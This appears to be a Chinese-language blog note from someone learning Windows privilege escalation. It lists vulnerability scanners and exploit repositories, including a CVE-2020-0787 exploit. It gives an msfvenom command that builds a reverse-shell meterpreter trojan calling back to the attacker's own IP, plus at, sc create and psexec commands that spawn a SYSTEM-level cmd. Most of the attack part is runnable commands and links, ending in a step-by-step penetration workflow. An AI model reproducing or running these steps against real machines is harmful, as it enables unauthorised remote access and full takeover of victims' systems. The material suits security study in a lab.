Win溢出漏洞及AT&SC&PS提权

9dbd8ce7a03ef218c28c24ec641d550d

windows权限提升

用户及用户组权限划分

245866bea53f37837ca8f25164c011fd

windows命令

9833ada11f696ccbdd84b427d99f3900

基于WEB环境下的权限提升

windows下的提权

首先是三款工具:

1
2
3
4
5
6
7
8
9
https://github.com/vulmon/Vulmap
https://github.com/bitsadmin/wesng
https://github.com/chroblert/WindowsVulnScan

或者:

https://blog.1997sty.com/cos/uploads/20220421/307a3b8d067c1bbcf2d3f9d387643cf0.zip --> Vulmap-master.zip
https://blog.1997sty.com/cos/uploads/20220421/dc656f5b4b5c88e8da0aa81c697a123a.zip --> wesng-master.zip
https://blog.1997sty.com/cos/uploads/20220421/94589be92e7c3d3aa4e604b0c6b9d1d8.zip --> WindowsVulnScan-master.zip

第一款工具我使用之后什么也没有

第二款使用如下,首先目标服务器上需要有python的环境,然后使用python进行运行

Snipaste_2023-07-28_09-38-11

第三款,首先它是有一个powershell的一个脚本,然后运行之后会有一个KB.json的脚本文件,那么这样在web权限下肯定是不能运行的,那么怎么进行运行呢?可以发现这个json的文件打开之后就是systeminfo的信息,那么你在目标机器上运行一下systeminfo这个指令再用json的格式写进去,在本机上运行这个python脚本同样是可以的

1
2
python -m pip -r install requirements.txt   //首先把这个库装上
python cve-check.py -C -f KB.json //运行python文件

Snipaste_2023-07-28_17-16-10

github上收集了一些exp的项目:https://github.com/SecWiki/windows-kernel-exploits

msf进行测试

1
2
3
4
5
6
7
8
msfvenom -p windows/meterpreter/reverse_tcp LPORT=6666 LHOST=自己的公网ip -f exe -o test.exe
//生成木马

---进入监听模块:use exploit/multi/handler
---设置payload反弹:set payload windows/meterpreter/reverse_tcp
---设置LHOST(0.0.0.0什么都监听)、LPORT参数(监听6666端口)
---在windows里面执行test.exe马子(拖到命令行里面运行,监听到了windows虚拟机)
//农夫那边这个实验已经做过了,所以不做了(主要是我的那个小服务器过期了0.0)

本地提权

1
https://github.com/cbwang505/CVE-2020-0787-EXP-ALL-WINDOWS-VERSION/releases/tag/1

Snipaste_2023-07-28_18-02-41

将这个文件放在windows7用户下,然后直接运行,就会弹出一个cmd命令窗口,用户就是system

基于本地环境下的权限提升-AT&SC&PS命令

at提权

针对win7之前的系统

1
2
3
4
5
6
:给系统添加一项作业,在21:26打开
at 21:26 /interactive cmd.exe
:查看作业详情
at
:删除作业
at /del

sc提权

使用sc命令创建一个syscmd的服务,绑定binPath的路径

1
sc Create syscmd binPath= "cmd /K start" type= own type= interact

启动这个服务

1
sc start syscmd

但是我使用普通用户写入这个命令,是成功不了的,只有在administrator用户的时候才能成功

Snipaste_2023-07-28_20-12-17

Snipaste_2023-07-28_20-14-33

上面这个是普通用户

ps提权

1
2
https://learn.microsoft.com/zh-cn/sysinternals/downloads/pstools
https://blog.1997sty.com/cos/uploads/20220421/f8b06bb36e55dbb6855da8099295a2b6.zip --> PSTools.zip

pstools是微软官方工具,是为windows提供的第三方工具库,注意,2008要使用psexec64.exe

1
2
psexec.exe -accepteula -s -i -d cmd.exe
psexec.exe -accepteula -s -i cmd.exe

这里好像也需要使用administrator用户的权限,有点鸡肋,我使用win7,win2003,win2008的普通用户都不能提权

总结

—渗透流程:信息收集—补丁筛选—利用MSF或者特定EXP—执行—西瓜到手

—提权方法有部分适用在不同环境(本地提权比web提权成功几率大),当然也有通用方法(看是否在powershell还是cmd)

—提权方法也有操作系统版本区别,特性决定方法利用面
—提权方法有部分需要特定环境,如数据库,第三方提权